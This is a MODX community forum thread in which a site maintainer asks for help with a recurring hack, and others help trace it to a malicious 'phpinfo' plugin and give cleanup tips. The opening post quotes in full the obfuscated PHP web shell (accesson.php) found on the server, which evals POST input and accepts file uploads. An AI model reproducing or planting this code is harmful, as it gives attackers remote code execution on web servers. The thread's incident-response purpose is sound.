On March 26, 2019 we launched new MODX Forums. Please join us at the new MODX Community Forums.
Subscribe: RSS
  • I've spent the last 2 days taking the site from 2.2.4 -> 2.6.1. Still though, a file gets written to assets/images called accesson.php. I noticed this file in another thread on an Evo site getting hacked.

    Short of starting from scratch with this site, is there a way to clean this up?

    Steps taken so far
    - Incrementally upgrading to 2.6.1
    - removed/reinstalled all extras
    - removed all user from modx_users (save for the new one I created for myself)
    - removed all FTP accounts

    accesson.php file reads
    <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

    This question has been answered by mayhemchaos. See the first response.

      Sal Baldovinos
      SEO & DIGITAL MARKETING

      ARIEL DIGITAL | Maximize Your Potential
      www.arieldigitalmarketing.com
    • discuss.answer
      Updated (Solved?)
      I started looking in the plugins/snippets area and wouldn't you know it...there was a phpinfo file in the plugins area that was the culprit.
        Sal Baldovinos
        SEO & DIGITAL MARKETING

        ARIEL DIGITAL | Maximize Your Potential
        www.arieldigitalmarketing.com
      • Thanks for the update! What extra had a phpinfo file?

        It seems as your server is compromised the same way as this: https://forums.modx.com/thread/102644/evo-1-2-1-hacked-again-and-again#dis-post-553027
          @hawproductions | http://mrhaw.com/

          Infograph: MODX Advanced Install in 7 steps:
          http://forums.modx.com/thread/96954/infograph-modx-advanced-install-in-7-steps

          Recap: Portland, OR (PDX) MODX CMS Meetup, Oct 6, 2015. US Bancorp Tower
          http://mrhaw.com/modx_portland_oregon_pdx_modx_cms_meetup_oct_2015_us_bancorp_tower
        • Quote from: mrhaw at Jan 02, 2018, 08:50 PM
          Thanks for the update! What extra had a phpinfo file?

          It seems as your server is compromised the same way as this: https://forums.modx.com/thread/102644/evo-1-2-1-hacked-again-and-again#dis-post-553027

          That's where I got the idea to check the plugins folder in MODX backend. It wasnt associated with a plugin, but there was a phpinfo file in there. I knew that couldnt be right. Look at the file and could clearly see where it was mkdir images/ and file accesson.php
            Sal Baldovinos
            SEO & DIGITAL MARKETING

            ARIEL DIGITAL | Maximize Your Potential
            www.arieldigitalmarketing.com
          • Yeah if you were running an old vulnerable version and got hacked, you'd need to clean up the hack separately to upgrading as upgrading won't remove the file(s) by itself.
              I'm lead developer at Digital Penguin Creative Studio in Hong Kong. https://www.digitalpenguin.hk
              Check out the MODX tutorial series on my blog at https://www.hkwebdeveloper.com
            • Hi,
              Not sure if you have fully solved this issue yet but wanted to let you know to check in the `modx_site_plugins` table, I found a "phpinfo" plugin there that was responsible for generating content. Before you delete the row make a not of the ID and then check the `modx_site_plugin_events` table for events associated with the malicious plugin.
              • Quote from: dantarifa at Jan 19, 2018, 05:53 PM
                Hi,
                Not sure if you have fully solved this issue yet but wanted to let you know to check in the `modx_site_plugins` table, I found a "phpinfo" plugin there that was responsible for generating content. Before you delete the row make a not of the ID and then check the `modx_site_plugin_events` table for events associated with the malicious plugin.

                I didnt notice anything in the DB - as far as I know (not my client - subcontract) the site is doing good laugh
                  Sal Baldovinos
                  SEO & DIGITAL MARKETING

                  ARIEL DIGITAL | Maximize Your Potential
                  www.arieldigitalmarketing.com